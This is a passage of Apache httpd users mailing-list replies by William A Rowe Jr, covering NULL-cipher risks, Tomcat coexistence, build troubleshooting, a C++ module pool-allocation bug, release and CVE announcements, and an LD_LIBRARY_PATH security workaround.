way' to package rpm/deb/etc, but have a look in the build/ directory of your
source tarball.


> On 12/08/2015 09:41 AM, Ron Croonenberg wrote:
>
>> so in the source tree:
>>
>> modules/ssl
>>
>>
>> in: ssl_engine_config.c
>> I see two lines:
>> arg = apr_pstrcat(cmd->pool, "!aNULL:!eNULL:!EXP:", arg, NULL);
>>
>> and tossed eNULL out
>>
>> in: ssl_engine_init.c
>> I see a line:
>> apr_pstrcat(ptemp, "!aNULL:!eNULL:!EXP:", SSL_DEFAULT_CIPHER_LIST,
>>
>> these 3 locations are the only places where NULL ciphers are excluded,
>> right?
>>
>
Offhand, yes.



> P.S:  why not make it an option that can be configured and where the
>> default 'setting' is "no NULL ciphers" ?
>>
>
Because a very tiny fraction of the users who toggle such an option
will know what they are doing.

You clearly do, however you may or may not find the performance gains
you are hoping for, there are more efficient auth mechanisms such as
digest authentication that will not pass passwords in the clear, and there
are others such as gssapi that perform the authentication function alone
using typical linux semantics.

Have you looked at https://github.com/modauthgssapi/mod_auth_gssapi
as an alternative for this particular use case?

Re: [users@httpd] explicitly including other ciphers for use with https

[William A Rowe Jr]

On Dec 7, 2015 11:36 PM, "Marat Khalili"  wrote:
>>
>> Everything *after* that handshake, in cleartext, is open for inspection
or for manipulation
>
> Are you sure about the manipulation part? Why do you think encryption
helps here then?

To turn the question around, what gives you the suggestion that the user
agent or the httpd server would notice any modification of plaintext bytes
in transit through a router or other network intermediate?

Re: [users@httpd] explicitly including other ciphers for use with https

[William A Rowe Jr]

On Mon, Dec 7, 2015 at 7:40 PM, Jacob Champion <champio...@gmail.com> wrote:

> On 12/07/2015 05:06 PM, William A Rowe Jr wrote:
>
>> On Mon, Dec 7, 2015 at 2:39 PM, Ron Croonenberg <r...@lanl.gov
>> <mailto:r...@lanl.gov>> wrote:
>>
>> Hello,
>>
>> I a building a storage system, using HTTP/HTTPS for ingesting data.
>>
>> I would like to use the authentication over HTTPS, while after that
>> I want no encryption on the data because of peformance.
>>
>>
>> Then you probably don't understand the performance impact of TLS.
>>
>
> To help Ron out a little... he's coming from this conversation [1] on the
> openssl-users mailing list, where he's described his rather unusual network
> topology already.
>
> I'm still unsure as to whether or not his proposed solution is secure...
> but I am convinced that his use case is atypical.


It should be straightforward to patch mod_ssl to accept null ciphers, for
such an unusual use case, but it isn't something we would likely accept in
the ASF distribution for the reasons I outlined.


> Otherwise,
>> any man-in-the-middle can observe the data in transit and alter
>> the data passed between your client and backend storage server
>>
>
> Wait, why does the use of NULL encryption have any effect on the
> authenticity/integrity characteristics of the cipher? I asserted otherwise
> on openssl-users and was not corrected...
>

I didn't suggest it that it would.  Everything *after* that handshake, in
cleartext, is open for inspection or for manipulation by every link in
between the user agent and server.


> --Jacob
>
> [1] https://marc.info/?t=14490098273=1=2

Re: [users@httpd] Apache2 and Tomcat : Simultaneously running both servers and Virtual Hosting.

[William A Rowe Jr]

Pretty simple answer, you either,

1. Change the Tomcat port, E.g. 8080 so it doesn't collide with httpd, or

2. Listen (IPaddr1):80 to httpd and bind (IPaddr2):80 to Tomcat.

The second can be more confusing, since if you bind localhost:80 to Tomcat,
httpd won't respond unless you make a request to its own IP listener.
On Dec 7, 2015 07:13, "Kernel freak"  wrote:

> Hello friends,
>
> I am working on some server side changes in which I have the webapps or
> website hosted by Apache server is called by the URL. So if url is
> www.domain-one.com, then the specific webapp or website must be served.
>
> I have partial success in these regards as I have already configured
> Apache Tomcat to host multiple webapps, and call them based on URL. It is
> working.
>
> Now on to the 2nd stage of problem, where I have hosted a CMS on Apache
> server, and would like to call it with a URL, *but also keep Apache
> tomcat running in parallel*, and this is the main problem I am dealing
> with.
>
> This may seem like a Apache server issue, but it's both, as I want to run
> Apache web-server and Apache tomcat simultaneously with Virtual hosting. I
> just hope there might be people here who know both servers.
>
> I tried mod_jk without any luck. Here are the changes I made to tomcat and
> apache server.
>
> Tomcat changes : server.xml :
>
>  compression="force" compressionMinSize="1024"
>connectionTimeout="2"  maxPostSize="5242880"
>URIEncoding="utf-8"
>  compressableMimeType="text/html,text/xml,text/plain,text/css,text/ 
> javascript,application/x-javascript,application/javascript"/>
>
>
>  maxPostSize="5242880" SSLEnabled="true" maxThreads="200" compre$
>   compressionMinSize="1024" scheme="https" secure="true" 
> clientAuth="false"  sslProtocol="TLS"
>keystoreFile="keystorefile" keystorePass="PASSWORD" 
> URIEncoding="utf-8"
>  compressableMimeType="text/html,text/xml,text/plain,text/css,text/ 
> javascript,application/x-javascript,application/javascript"/>
>
>
>
>   autoDeploy="true"/>
>  appBase="tooltank_webapps">
> www.domain-first.com
> 
> 
>
>  appBase="aupair_webapps">
> www.domain-second.com
> 
>
>
> 
>  URIEncoding="utf-8"
>  compressableMimeType="text/html,text/xml,text/plain,text/css,text/ 
> javascript,application/x-javascript,application/javascript"
> />
>
>
>
> Installed mod_jk with following command :
>
>
>   apt-get install libapache2-mod-jk
>
> Created file workers.properties in /etc/apache2/
>
>
> # Define 1 real worker using ajp13
>  worker.list=worker
>  # Set properties for worker (ajp13)
>  worker.worker.type=ajp13
>  worker.worker.host=localhost
>  worker.worker.port=8010
>
> Instructed jk.conf to load this file :
>
>
> JkWorkersFile /etc/apache2/workers.properties
>
>
> Finally edited 000-default in sites-enabled to add :
>
>
> JkMount /home/user/tomcat_directory/* worker1
>
> Then restarted Apache2, and I got this error :
>
>
> [] Restarting web server: apache2(98)Address already in use: make_sock: 
> could not bind to address [::]:80
> (98)Address already in use: make_sock: could not bind to address 0.0.0.0:80
> no listening sockets available, shutting down
> Unable to open logs
> Action 'start' failed.
> The Apache error log may have more information.
>  failed!
>
>
> I understand that Tomcat is running on 80, but how do I then configure the 
> servers so they can run simultaneously.
>
> Kindly let me know..
>
> Regards,
>
> Akshay S.
>
>

Re: [users@httpd] explicitly including other ciphers for use with https

[William A Rowe Jr]

On Mon, Dec 7, 2015 at 2:39 PM, Ron Croonenberg  wrote:

> Hello,
>
> I a building a storage system, using HTTP/HTTPS for ingesting data.
>
> I would like to use the authentication over HTTPS, while after that I want
> no encryption on the data because of peformance.
>

Then you probably don't understand the performance impact of TLS.

TLS is very expensive to negotiate between endpoints working from
elliptic curve or prime math.  There's no avoiding this initial hit if you
are going to use TLS whatsoever.

Once the endpoints have completed the handshake, they exchange
keys for a much simpler and more performant cipher such as the
AES-256 cipher (for faster performance, you could use AES-128
depending on the application).

You will measure very little benefit dropping TLS once the handshake
and your auth step is completed.


> I think using  null ciphers, like eNULL would work, but how do I change
> the configurations is httpd.conf/ssl.conf ?
>
> The NULL cipher keys are in openssl,  I just want to use them.
>

Only if you have 100% faith in the end-to-end topography of your
network. That pretty much restricts you to localhost:. Otherwise,
any man-in-the-middle can observe the data in transit and alter
the data passed between your client and backend storage server,
which makes the entire point of authenticating rather silly, don't
you think?



.

Re: [users@httpd] Apache modules built as .a and .la instead of .so libraries

[William A Rowe Jr]

Go back to how you initially built apr, that is going to be the origin of
the libtool
used by httpd.

On Fri, Nov 20, 2015 at 8:23 AM, spggwp7q  wrote:

> Hi guys,
>
> I'm building apache 2.4.x (latest) for Solaris on Intel. I've built a
> cross compiler for this, which seems to be working fine. That said, all my
> modules are being built as .a and .la files, rather than .so files. Apache
> fails to start when it tries to load modules, saying that it cannot find
> .so, which makes sense.
>
> Here's my configure command:
>
> CC="/home/user/cross/x86_64-pc-solaris/bin/x86_64-pc-solaris2.10-gcc"
> CFLAGS="-m64 -O3 -march=core2 -mfpmath=sse -msse3 -mno-ssse3" ./configure
> --prefix=/opt/SP/apache/apache-2.4.17-intel-x64
> --with-ssl=/home/user/cross/x86_64-pc-solaris/openssl-1.0.2d
> --target=$TARGET --host=$TARGET --with-sysroot=$SYSROOT
> ac_cv_file__dev_zero=yes ac_cv_func_setpgrp_void=yes
> ap_cv_void_ptr_lt_long=no --enable-deflate --enable-log_forensic
> --enable-ssl --enable-mime_magic --enable-mpms-shared='prefork worker'
> --with-mpm=prefork --with-pcre=/home/user/cross/x86_64-pc-solaris/pcre-8.37
>
> I've compiled PCRE with the same compiler and the same flags and I got .so
> libraries along with .a and .la versions.
>
> user@ubuntu-vm:~/cross/x86_64-pc-solaris/pcre-8.37/lib$ ls -lF
> total 480
> -rw-r--r-- 1 user user 218250 Nov 20 00:24 libpcre.a
> -rw-r--r-- 1 user user  50356 Nov 20 00:24 libpcrecpp.a
> -rwxr-xr-x 1 user user   1125 Nov 20 00:24 libpcrecpp.la*
> lrwxrwxrwx 1 user user 19 Nov 20 00:24 libpcrecpp.so ->
> libpcrecpp.so.0.0.1*
> lrwxrwxrwx 1 user user 19 Nov 20 00:24 libpcrecpp.so.0 ->
> libpcrecpp.so.0.0.1*
> -rwxr-xr-x 1 user user  45896 Nov 20 00:24 libpcrecpp.so.0.0.1*
> -rwxr-xr-x 1 user user954 Nov 20 00:24 libpcre.la*
> -rw-r--r-- 1 user user   6552 Nov 20 00:24 libpcreposix.a
> -rwxr-xr-x 1 user user   1054 Nov 20 00:24 libpcreposix.la*
> lrwxrwxrwx 1 user user 21 Nov 20 00:24 libpcreposix.so ->
> libpcreposix.so.0.0.3*
> lrwxrwxrwx 1 user user 21 Nov 20 00:24 libpcreposix.so.0 ->
> libpcreposix.so.0.0.3*
> -rwxr-xr-x 1 user user  11336 Nov 20 00:24 libpcreposix.so.0.0.3*
> lrwxrwxrwx 1 user user 16 Nov 20 00:24 libpcre.so -> libpcre.so.1.2.5*
> lrwxrwxrwx 1 user user 16 Nov 20 00:24 libpcre.so.1 ->
> libpcre.so.1.2.5*
> -rwxr-xr-x 1 user user 129264 Nov 20 00:24 libpcre.so.1.2.5*
> drwxrwxr-x 2 user user   4096 Nov 20 00:24 pkgconfig/
> user@ubuntu-vm:~/cross/x86_64-pc-solaris/pcre-8.37/lib$
>
> Any idea how I can get gcc to build .so files for Apache?
>
> Regards,
> K.
>
> -
> To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
> For additional commands, e-mail: users-h...@httpd.apache.org
>
>

Re: [users@httpd] Is there a shell environment variable to direct httpd to a httpd.conf ?

[William A Rowe Jr]

On Fri, Nov 20, 2015 at 4:03 PM, Christopher Schultz <
ch...@christopherschultz.net> wrote:

> Gary,
>
> On 11/20/15 4:44 PM, Gary M wrote:
> > I'm in a unique configuration dilemma where I need to place the location
> > of httpd.conf in a "soft" location. eg the shell environment variable.
> >
> > I did look and cannot find the answer.
> >
> > The question: "is there a shell environment variable read by httpd
> > pointing to the conf file ? "
> >
> > This is windows,, I have another solution for linux and solaris.
>
> Can you do:
>
> C:\> \path\to\bin\httpd -f %HTTPD_DOT_CONF%
>

Note also that any -f, -d, -D args you pass to httpd install on Windows
sets up the service with those values.

If interpolation is on for the startup arg in the nt registry, then you
should be able to honor envvar substitution, but note that envvar
substition for services is based on the envvars at *boot time*.  Changing
them globally or per-user and restarting the service will not affect the
services environment until you reboot.

Re: [users@httpd] how to compile apache httpd 2.4.17

[William A Rowe Jr]

On Nov 16, 2015 17:21, "David Long"  wrote:
>
> I download Apache httpd 2.4.17 and want compile on Solaris 10 Sparc.
>
> It ask me to install APR.
>
> So I download APR 1.5.2 and try to configure it and following error.
>
>
>
> root@kiana# cd /www/apachesrc/apr-1.5.2
>
> root@kiana# ./configure
--prefix=/www/apachesrc/httpd-2.4.17/srclib/apr/configure

Yuck...

You are best off choosing the same --prefix for apr and apr-util as you
intend to use for httpd itself.  Then tell apr-util and httpd the
--with-apr=path so they install to the same place, e.g. /use/local or
/opt/httpd as you like.

>
> checking build system type... sparc-sun-solaris2.10
>
> checking host system type... sparc-sun-solaris2.10
>
> checking target system type... sparc-sun-solaris2.10
>
> Configuring APR library
>
> Platform: sparc-sun-solaris2.10
>
> checking for working mkdir -p... yes
>
> APR Version: 1.5.2
>
> […]
>
> config.status: creating include/arch/unix/apr_private.h
>
> config.status: executing libtool commands
>
> libtoolT: No such file or directory
>
> config.status: executing default commands
>
> config.status: include/apr.h is unchanged
>
> config.status: include/arch/unix/apr_private.h is unchanged
>
>
>
> I do have libtool package installed but don't know what libtoolT means.

This is new to me.  We bundle libtoolize with apr, you didn't need a system
libtoolize.  However, maybe libtoolize fails to configure because it can't
work out your gcc/cc/ld?

RE: [users@httpd] how to compile apache httpd 2.4.17

[William A Rowe Jr]

The order is always apr, expat and Lib before openssl before apr-util, plus
pcre before httpd.
On Nov 17, 2015 14:46, "David Long" <dl...@lynden.com> wrote:

> Hi William,
>
> Should I download apr-util first and compile it?
>
> I have not download apr-util and compile it on the system yet.
>
>
>
> Thanks for your help.
>
>
>
> David Long
>
>
>
> *From:* William A Rowe Jr [mailto:wr...@rowe-clan.net]
> *Sent:* Tuesday, November 17, 2015 11:36 AM
> *To:* users@httpd.apache.org
> *Subject:* Re: [users@httpd] how to compile apache httpd 2.4.17
>
>
>
>
> On Nov 16, 2015 17:21, "David Long" <dl...@lynden.com> wrote:
> >
> > I download Apache httpd 2.4.17 and want compile on Solaris 10 Sparc.
> >
> > It ask me to install APR.
> >
> > So I download APR 1.5.2 and try to configure it and following error.
> >
> >
> >
> > root@kiana# cd /www/apachesrc/apr-1.5.2
> >
> > root@kiana# ./configure
> --prefix=/www/apachesrc/httpd-2.4.17/srclib/apr/configure
>
> Yuck...
>
> You are best off choosing the same --prefix for apr and apr-util as you
> intend to use for httpd itself.  Then tell apr-util and httpd the
> --with-apr=path so they install to the same place, e.g. /use/local or
> /opt/httpd as you like.
>
> >
> > checking build system type... sparc-sun-solaris2.10
> >
> > checking host system type... sparc-sun-solaris2.10
> >
> > checking target system type... sparc-sun-solaris2.10
> >
> > Configuring APR library
> >
> > Platform: sparc-sun-solaris2.10
> >
> > checking for working mkdir -p... yes
> >
> > APR Version: 1.5.2
> >
> > […]
> >
> > config.status: creating include/arch/unix/apr_private.h
> >
> > config.status: executing libtool commands
> >
> > libtoolT: No such file or directory
> >
> > config.status: executing default commands
> >
> > config.status: include/apr.h is unchanged
> >
> > config.status: include/arch/unix/apr_private.h is unchanged
> >
> >
> >
> > I do have libtool package installed but don't know what libtoolT means.
>
> This is new to me.  We bundle libtoolize with apr, you didn't need a
> system libtoolize.  However, maybe libtoolize fails to configure because it
> can't work out your gcc/cc/ld?
>

[users@httpd] Re: FAQ?

[William A Rowe Jr]

On Sun, Nov 15, 2015 at 11:09 AM, yousuf sharief 
wrote:

> Hi All,
>
> Please share the FAQ's to update my skills on Apache.
>

At this time there isn't an actively maintained FAQ, but the historical
one is editable at http://wiki.apache.org/httpd/FAQ

If folks on users@ wanted to start maintaining and updating this more
frequently, it might be helpful for the users community.

[users@httpd] Re: merging Apache context

[William A. Rowe Jr.]

On Fri, Oct 30, 2015 at 5:23 PM, Greenberg, Adam <adam.greenb...@fmr.com> wrote:
> Hi Bill (this is a resend to include the dev and user communities, per your
> instructions):

Sorry for any misunderstanding - this seems like a good users@ question
(with some C++ thrown in!) so I'm dropping the dev@ list. FWIW attaching
the source file as text instead of a tar file lets others quickly examine and
participate in the discussion, posts with archive attachments are often
ignored for lack of time, even if they might be interesting to other readers.

> Thanks very much for the prompt response. I believe we have covered all of
> the steps you indicate below.

Yea, someone should steal that troubleshooting list and throw it on the wiki.
Might be useful to Nick if he publishes an update to the module authoring
volume.

> Attached please find a tar file that contains
> a simple C++ module and a makefile to build it.
>
> Our test server http.conf has a LoadModule line for the module and then the
> following set of directory sections:
>
> 
>   dirConfig /foo
> 
>
> 
>   dirConfig /
> 
>
> 
>   dirConfig /foo/bar
> 
>
> When we execute the server, we see this on the console:
> # bin/apachectl start
> Created dirConfig for context: unset
> Created dirConfig for context: /foo/
> Inserted dirConfig with message: /foo
> Created dirConfig for context: /
> Inserted dirConfig with message: /
> Created dirConfig for context: /foo/bar/
> Inserted dirConfig with message: /foo/bar
> Created dirConfig for context: unset
>
> And this in the log:
> Merged config: unset:/
> hookFunc: for request /foo/bar/foo.html the context is: unset:/
>
> We do not see any other messages. The file /foo/bar/foo.html exists and the
> browser displays it. This suggests that the merge sequence for the last
> directory section stopped with the configuration for the “/” section.
> Perhaps you could point out what would cause this behavior?

As I mentioned when I had a chance to teach this material, server
configs are almost
exclusively allocated at startup time out of the pconf - configuration
pool.  It is a pool
whose contents should -never- change for the lifetime of the server
worker processes.
But it *does* change in the parent process, when a restart is
requested, the existing
pconf is dumped and a new pconf is allocated, and the configuration is re-read.

But dir configs are a different beast, they may be created at runtime
(for example,
.htaccess file contents), merged for the top request, all internal
redirects, and all
of the subrequests (mod_autoindex or mod_dav_fs can cause thousands of these
to present just one file listing).  They absolutely must be allocated
from the pool
passed to the create() or merge() handler.

In your C++ code, you have;

void * dirConfig::create_dc( apr_pool_t * pool, char * context )
{
  // Create the configuration object.
  dirConfig * cfg = new dirConfig();
  if (NULL == cfg)
  {
// An allocation error.
return NULL;
  }
  // Keep the context name.
  std::string temp = "unset";

  if (NULL != context)
  {
temp = context;
  }
  cfg->setContext( temp );

  std::cerr << "Created dirConfig for context: " << temp << std::endl;
  return (void *) cfg;
}

Here's the first problem... you allocated dirConfig() but didn't allocate this
from the given pool.  You then returned a naked pointer to the C++ object,
and I have no idea offhand whether that permanently increases the object's
use count, or whether the dirConfig object is then released immediately
upon the return from the create_dc function.

You can register a pool cleanup against this pool which destroys the
given dirConfig, but that would be a costly proposition performance-wise.
Do this only if it must be a managed type, and that should only be for
your per-request or per-connection objects.  You should handle these
httpd structures (server config, dir config, etc) as unmanaged "C" data
and let the pool schema perform your cleanups for you.

You probably want to start with this change to watch lifetimes;
dirConfig::~dirConfig()
{
  std::cerr << "Destroyed dirConfig of context: " << _context << std::endl;
}

You also may want to watch your objects a little more closely by emitting
the memory address of 'this' itself, so you can determine that the object
being modified is the object created, both in your directive handler and
in the merge function, etc.

Maybe another dev/user who has coded some C++ modules can offer
some more ideas and insight here.  I wrote mod_aspdotnet under MS
managed C++.NET years ago and ran into many issues where I had
to properly unbox and re-box the managed data when passing it back
and forth from unmanaged httpd "C" code.  That source code lives
http://sourceforge.net/p/mod-aspdotnet/code/HEAD/tree/mod_aspdotnet

[users@httpd] Re: Festina Lente - Nóirín Plunkett / Shirley

[William A Rowe Jr]

On Wed, Jul 29, 2015 at 2:05 PM, Jim Jagielski j...@jagunet.com wrote:

 If you have ever read the httpd doccos, there are many people who
 made them what they are, and are deserving of thanks. But today we
 have lost one of the main and core talents behind them.

 Nóirín was a bright light and a festive soul; they were talented
 and humble, with a passion tempered by joy and love. Their life
 had many highs, and some crushing lows, but Nóirín was always open
 and listened to their heart.

 I will miss Nóirín. We all will.


Indeed, we all do, thank you for your thoughtful words, Jim.

You can find our community's page memorializing Nóirín's life and
participation
and love for the at the ASF here;

www.apache.org/memorials/noirin.html

[users@httpd] [Announcment] Apache HTTP Server 2.2.27 Released

[William A. Rowe Jr.]

   Apache HTTP Server 2.2.27 Released

   The Apache Software Foundation and the Apache HTTP Server Project are
   pleased to announce the release of version 2.2.27 of the Apache HTTP
   Server (Apache).  This version of Apache is principally a security
   and bug fix maintenance release.

   CVE-2014-0098 (cve.mitre.org)
 Segfaults with truncated cookie logging.
 mod_log_config: Prevent segfaults when logging truncated
 cookies. Clean up the cookie logging parser to recognize
 only the cookie=value pairs, not valueless cookies.

   CVE-2013-6438 (cve.mitre.org)
 mod_dav: Keep track of length of cdata properly when removing
 leading spaces. Eliminates a potential denial of service from
 specifically crafted DAV WRITE requests

   We consider the Apache HTTP Server 2.4 release to be the best version
   of Apache available, and encourage users of 2.2 and all prior
   versions to upgrade.  This 2.2 maintenance release is offered for
   those unable to upgrade at this time.  For further details, see:

 http://www.apache.org/dist/httpd/Announcement2.4.txt

   Apache HTTP Server 2.4 and 2.2.27 are available for download from:

 http://httpd.apache.org/download.cgi

   Please see the CHANGES_2.2 file, linked from the download page, for a
   full list of changes.  A condensed list, CHANGES_2.2.27 includes only
   those changes introduced since the prior 2.2 release.  A summary of
   all of the security vulnerabilities addressed in this and earlier
   releases is available:

 http://httpd.apache.org/security/vulnerabilities_22.html

   This release includes the Apache Portable Runtime (APR) version 1.5.0
   and APR Utility Library (APR-util) version 1.5.3, bundled with the
   tar and zip distributions.  The APR libraries libapr and libaprutil
   (and on Win32, libapriconv version 1.2.1) must all be updated to
   ensure binary compatibility and address many known security and
   platform bugs. APR version 1.5 and APR-util version 1.5 represent
   minor version upgrades from earlier httpd 2.2 source distributions.

   This release builds on and extends the Apache 2.0 API and is
   superceeded by the Apache 2.4 API.  Modules written for Apache 2.0
   or 2.4 will need to be recompiled in order to run with Apache 2.2,
   and most will require minimal or no source code changes.

   When upgrading or installing this version of Apache, please bear in
   mind that if you intend to use Apache with one of the threaded MPMs
   (other than the Prefork MPM), you must ensure that any modules you
   will be using (and the libraries they depend on) are thread-safe.

-
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] Win32 Binary without crypto (no mod_ssl) (MSI Installer): httpd-2.2.23-win32-x86-no_ssl.msi

[William A. Rowe Jr.]

On 10/22/2012 1:18 PM, Yehuda Katz wrote:
 Any idea what would be required for someone who wanted to volunteer to manage 
 windows builds?

Binaries are created/distributed only by httpd committers as a matter
of policy (irrespective of platform).  This is due to the ASF's own
liabilities and web of trust policy.  There are external vendors and
distributors of httpd, anyone is welcome to build and/or distribute
ASF sources, we neither endorse nor dissuade users from using such
distributions.  Note that problem reports on 'distributor X's package'
belong on that distributor's forum or site, not on ASF issue trackers.
All that said, thanks for offering, and if you wish to become a
committer it is a matter of consistent contributions in the form of
patches to the dev@ or docs@ list!

I've personally been deeply disconnected from httpd due to rearranging
a host of build machines between physical machines, and a completely
bugged email provider, but hope to be back in a position to create new
httpd 2.2.23 (with a 0.9.8 openssl refresh) sometime this week.  Then
on to working on the WiX based 2.4 installer so we can throw away the
IS mess.

Cheers,

Bill


-
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] Segmentation fault error

[William A. Rowe Jr.]

You didn't dump the offending stack, you dumped the first stack.  It's highly
unlikely there was a segfault in _read.

You need to dump all the thread stacks, and work out the offending one; this is
usuallly designated  FAULT or some other indication of where the fault 
occured.

On 5/30/2012 10:32 AM, Ishita Kapadiya wrote:
 Thanks Nick.
 I have compiled Apache for myself both the time and both are 32-bit.
 The same modules all other instances are using and thus i am not sure
 what is different with this instance that causing Segmentation fault
 error.
 
 I tried to dig more into it and here is what i got -
 
 mdb core
 ::stack
 libc.so.1`_read+0xc(6, ffbff5e3, 1, 0, 10b4, fef73ac0)
 ap_mpm_pod_check+0x18(d6800, 68764, 68f8c, 1b7ec0, 0, 1)
 child_main+0x2d4(0, 682dc, 0, fee58000, fef73700, fedf2a00)
 make_child+0x128(9bc00, 0, 1, 9cc00, 9b400, 9c800)
 ap_mpm_run+0x740(fe720058, 4, 0, a, 1, 0)
 main+0x77c(a7810, 99c00, 9bc00, 9bc00, a5808, 0)
 _start+0x5c(0, 0, 0, 0, 0, 0)
 
 pstack core
  fef45874 _read(6, ffbff5e3, 1, 0, 10b4, fef73ac0) + c
  0006b714 ap_mpm_pod_check (d6800, 68764, 68f8c, 1b7ec0, 0, 1) + 18
  000697b4 child_main (0, 682dc, 0, fee58000, fef73700, fedf2a00) + 2d4
  00069930 make_child (9bc00, 0, 1, 9cc00, 9b400, 9c800) + 128
  0006a160 ap_mpm_run (fe720058, 4, 0, a, 1, 0) + 740
  00029bc8 main (a7810, 99c00, 9bc00, 9bc00, a5808, 0) + 77c
  00028f7c _start   (0, 0, 0, 0, 0, 0) + 5c
 
 pmap core
 0001 448K r-x--  /abc/apache-2.2.22/bin/httpd
 0008  32K r-x--
 00096000  24K rwx--  /abc/apache-2.2.22/bin/httpd
 0009C000  16K rwx--  /abc/apache-2.2.22/bin/httpd
 000A6528K rwx--[ heap ]
 FAB7A000   8K rw---[ stack tid=36 ]
 ...
 (removed rest of the lines to avoid length)
 
 mdb /abc/apache-2.2.22/bin/httpd
 
 ::dis ap_mpm_pod_check!head
 ap_mpm_pod_check:   save  %sp, -0x78, %sp
 ap_mpm_pod_check+4: ld[%i0], %o1
 ap_mpm_pod_check+8: call  +0x2d0e0  PLT:apr_os_file_get
 ap_mpm_pod_check+0xc:   add   %fp, -0x14, %o0
 ap_mpm_pod_check+0x10:  ld[%fp - 0x14], %o0
 ap_mpm_pod_check+0x14:  add   %fp, -0x15, %o1
 ap_mpm_pod_check+0x18:  call  +0x2cdc4  PLT:read
 ap_mpm_pod_check+0x1c:  mov   1, %o2
 
 Please help me what could be the problem? It's affecting my production
 env and i really don't know what to do next?
 
 On Tue, May 29, 2012 at 7:15 PM, Nick Kew n...@webthing.com wrote:

 On 29 May 2012, at 23:11, Ishita Kapadiya wrote:

 Hi All,

 I am using this configurations -

 Solaris sparc 10/apache 2.2.22/openssl 1.0.0g/simteminder sso/mod-jk 1.30

 Did you compile everything yourself?

 If yes, could any compile options have changed?  E.g. between 32-bit and 
 64-bit,
 or something less obvious but just as important?

 If no, what suppliers do your binaries come from, and have you checked with 
 them?

 --
 Nick Kew
 -
 To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
 For additional commands, e-mail: users-h...@httpd.apache.org

 
 -
 To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
 For additional commands, e-mail: users-h...@httpd.apache.org
 
 
 


-
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] LD_LIBRARY_PATH issue in 2.2.22 and earlier

[William A. Rowe Jr.]

On 5/24/2012 12:05 PM, Luke Lozier wrote:
 One of the PCI scanning companies is demanding an upgrade to 2.4.2 due to the 
 issues
 described in this CVE:
 
 Changes with Apache 2.2.23
 
   *) SECURITY: CVE-2012-0883 (cve.mitre.org http://cve.mitre.org)
  envvars: Fix insecure handling of LD_LIBRARY_PATH that could lead to the
  current working directory to be searched for DSOs. [Stefan Fritsch]
 
 Is there any idea when 2.2.23 will be released? I'd rather not upgrade to 
 2.4.2

Modify your installed envvars (and envvars-std) script and apachectl (or 
equivilant
script provided by your application vendor) to ensure that this code is changed;


@@ -18,6 +18,10 @@
 #
 # This file is generated from envvars-std.in
 #
-LD_LIBRARY_PATH=/path/to/httpd/lib:$LD_LIBRARY_PATH
+if test x$LD_LIBRARY_PATH != x ; then
+  LD_LIBRARY_PATH=/path/to/httpd/lib:$LD_LIBRARY_PATH
+else
+  LD_LIBRARY_PATH=/path/to/httpd/lib
+fi
 export LD_LIBRARY_PATH
 #

On oddball platforms this may be LIBPATH or SHLIB_PATH instead of 
LD_LIBRARY_PATH.
If your platform's apachectl script invokes envvars, you are done.  If it 
doesn't,
there may be an insecure LD_LIBRARY_PATH assignment, just use the example above.

Upgrading for this defect is frankly silly, although effective.  There is no 
planned
date yet for 2.2.23 although it will come along sometime in the not too distant
future.

-
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] Denial of Service due to multiplication of httpd running

[William A. Rowe Jr.]

On 5/22/2012 12:02 PM, Bill Unruh wrote:
 
 Eg, here is one entry from the ps auxww  list
 
 apache   18137  0.0  0.5  26844  5744 ?S09:34   0:00 
 /usr/sbin/httpd -f
 /etc/httpd/conf/httpd.conf -DAPACHE2 -DHAVE_PERL -DHAVE_PHP5 -DHAVE_ACTIONS 
 -DHAVE_ALIAS
 -DHAVE_ASIS -DHAVE_AUTH_BASIC -DHAVE_AUTH_DIGEST -DHAVE_AUTHN_ALIAS 
 -DHAVE_AUTHN_ANON
 -DHAVE_AUTHN_DBM -DHAVE_AUTHN_DEFAULT -DHAVE_AUTHN_FILE -DHAVE_AUTHZ_DBM
 -DHAVE_AUTHZ_DEFAULT -DHAVE_AUTHZ_GROUPFILE -DHAVE_AUTHZ_HOST 
 -DHAVE_AUTHZ_OWNER
 -DHAVE_AUTHZ_USER -DHAVE_AUTOINDEX -DHAVE_BUCKETEER -DHAVE_CASE_FILTER
 -DHAVE_CASE_FILTER_IN -DHAVE_CERN_META -DHAVE_CGI -DHAVE_CGID 
 -DHAVE_CHARSET_LITE
 -DHAVE_DIR -DHAVE_DUMPIO -DHAVE_ECHO -DHAVE_ENV -DHAVE_EXAMPLE -DHAVE_EXPIRES
 -DHAVE_EXT_FILTER -DHAVE_FILTER -DHAVE_HEADERS -DHAVE_IDENT -DHAVE_IMAGEMAP 
 -DHAVE_INCLUDE
 -DHAVE_INFO -DHAVE_LOG_CONFIG -DHAVE_LOG_FORENSIC -DHAVE_LOGIO -DHAVE_MIME
 -DHAVE_MIME_MAGIC -DHAVE_NEGOTIATION -DHAVE_OPTIONAL_FN_EXPORT 
 -DHAVE_OPTIONAL_FN_IMPORT
 -DHAVE_OPTIONAL_HOOK_EXPORT -DHAVE_OPTIONAL_HOOK_IMPORT -DHAVE_REWRITE 
 -DHAVE_SETENVIF
 -DHAVE_SPELING -DHAVE_SSL -DHAVE_STATUS -DHAVE_SUBSTITUTE -DHAVE_SUEXEC 
 -DHAVE_UNIQUE_ID
 -DHAVE_USERTRACK -DHAVE_VERSION -DHAVE_VHOST_ALIAS

Never seen such a crazy startup line, I presume all of your modules have 
individual
IfDefine  blocks around each?

 At that time in the access_log I have a whole bunch of entries like
 ::1 - - [22/May/2012:09:34:22 -0700] OPTIONS * HTTP/1.0 200 - - 
 Apache/2.2.22
 (Mandriva Linux/PREFORK-0.1mdv2010.2) (internal dummy connection)

That's your own local loopback from a process running on this same box.

 In the past I have also had connections like 66.249.68.198 - - 
 [22/May/2012:09:35:25
 -0700] GET
 /aggregator/www.umsl.edu/~keelr/010/www.twitter.com/www.iaea.org/Publications/Documents/Board/2008/www.environment-agency.gov.uk/homeandleisure/floods/node/www.guardian.co.uk/business/2012/feb/21/node/node/22?page=11
